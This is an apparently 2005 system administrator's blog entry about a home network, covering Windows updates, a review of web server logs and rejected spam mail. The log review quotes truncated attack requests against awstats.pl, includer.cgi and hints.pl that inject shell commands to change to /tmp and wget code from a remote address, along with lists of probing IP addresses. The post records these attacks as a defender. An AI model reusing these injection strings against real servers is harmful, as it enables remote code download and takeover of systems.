SYSMGR

We're a bunch of Computers: Diana, Daphne, and Dido, called the 3D-cluster, running OpenVMS, Io running OpenVMS as well (in some obscure role in the network) Aphrodite, Athene and Irene running WindowsXP-Pro (SP2, of course) and Cerberus at the edge of the Network, with Charon, also running Linux, as standby. SYSMGR takes care of us.

Wednesday, December 14

14-Dec-2005

System management
There are new Windows updates available, so I updated Hera and Athene, and defragmented the disks. This caused Hera to malfuntion on reboot, but just once. Networked processing on Athene keeps giving hicks and ticks...

Security (web)
Checked web access log on Diana - the main one, that is. Last cycle has been in august, so it's time to take a look. Checked for CONNECT, found two (failed, of course) and POST. There, I found my own ones, of course, sending mail from elsewhere using webmail, but some unwanted addresses as well - warning me what to care for. I still have to dig down the following addresses, that tried to GET or POST things I do not have on the system - at the moment:

10-Nov-2005: 66.162.153.140
11-Nov-2005: 69.90.74.118
12-Nov-2005: 61.95.199.46
13-Nov-2005: 69.57.140.25
15-Nov-2005: 84.134.236.208, 81.80.172.225

16-Nov-2005: 217.78.63.15
17-Nov-1005: 64.109.216.229

19-Nov-2005: 211.214.161.159, 84.73.105.43, 82.234.215.180
21-Nov-2005: 138.80.0.10, 66.38.145.65
26-Nov-2005: 209.128.104.183

27-Nov-2005: 81.235.128.195
28-Nov-2005: 81.235.128.195
29-Nov-2005: 202.101.165.61
01-Dec-2005: 219.239.227.58
09-Dec-2005: 202.101.165.61

According timing (not given) these all must have run scripts. Except, perhaps, for one:

POST /_vti_bin/_vti_aut/author.dll

the rest is contain one or more of the following:

GET /path/awstats.pl?configdir=echo;echo%20YYY;cd%20%2ftmp%3bwget%20...
POST /path/xmlrpc.php
GET /path/includer.cgi?cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244...
GET /path/hints.pl?cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lup...
GET /path/webhints.pl?cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lup...

in a number of paths and formats. I guess the address on awstats access is 62.101.193.244 as well, or something in that range.
I still have to fully investigate all addresses and strings since my view was just 132 characters, but I'm warned (and others as well, I hope) before installation!

Security (mail)
Just a few, today:

14-DEC-2005 02:48:16.21 CLNTINRBL 24.177.139.8
14-DEC-2005 02:48:56.62 CLNTINRBL 85.169.44.48
14-DEC-2005 02:49:01.26 CLNTINRBL 222.48.36.84
14-DEC-2005 14:10:13.58 NOSPAMRLY 221.140.55.86 smtphunter22@daum.net
14-DEC-2005 17:59:06.66 CLNTINRBL 81.57.1.48

0 Comments:

Post a Comment

<< Home